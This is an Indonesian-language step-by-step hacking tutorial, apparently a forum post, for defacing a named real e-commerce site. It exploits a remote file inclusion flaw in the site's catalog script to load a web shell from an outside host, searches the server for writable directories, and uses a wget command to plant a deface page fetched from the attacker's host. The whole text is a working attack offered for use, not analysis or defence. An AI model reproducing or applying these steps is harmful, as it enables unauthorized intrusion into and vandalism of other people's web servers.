Catalog PHP

1. http://www.rascom.at/catalog/product...be164a40e92dc8 atau http://www.rascom.at/catalog/default.php?cPath=2

2. Kemudian hapus/delete product_info.php?products_id=322&PHPSESSID=a7d2068 8baf4b05261be164a40e92dc8 di url/browsing sehingga menjadi http://www.rascom.at/catalog/

3. Masukkan bug ini di belakang situs tadi :

includes/include_once.php?include_file=

Misal nya http://www.rascom.at/catalog/include...?include_file=

4. Masukkan file inject ini di belakang nya lagi :

http://k.domaindlx.com/batamhackercrew/sql.htm

Misal nya http://www.rascom.at/catalog/include...rcrew/sql.htm?

5. Di kolom cmd ketik :

find / -perm 777 -type d atau find / -perm 755 -type d

Tunggu beberapa saat.......

6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.

Contoh Permision Denied :

find: /usr/share/ssl/CA: Keine Berechtigung
find: /var/empty/sshd: Keine Berechtigung
find: /var/spool/cups: Keine Berechtigung

Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.

Contoh folder yg bisa : /var/www/html/www.rascom.at/catalog/images

7. Masukkan file deface ini :

http://k.domaindlx.com/batamhackercrew/jh.htm

8. Di kolom cmd ketik :

cd /var/www/html/www.rascom.at/catalog/images;wget http://k.domaindlx.com/batamhackercrew/jh.htm

Tunggu beberapa saat.......

10:35:02 (4 KB/s) - `jh.htm' saved

Itu artinya sukses ke save

9. Cara lihat hasil nya :

http://www.rascom.at/catalog/images/[file deface tadi]

10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://www.rascom.at/catalog/images/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.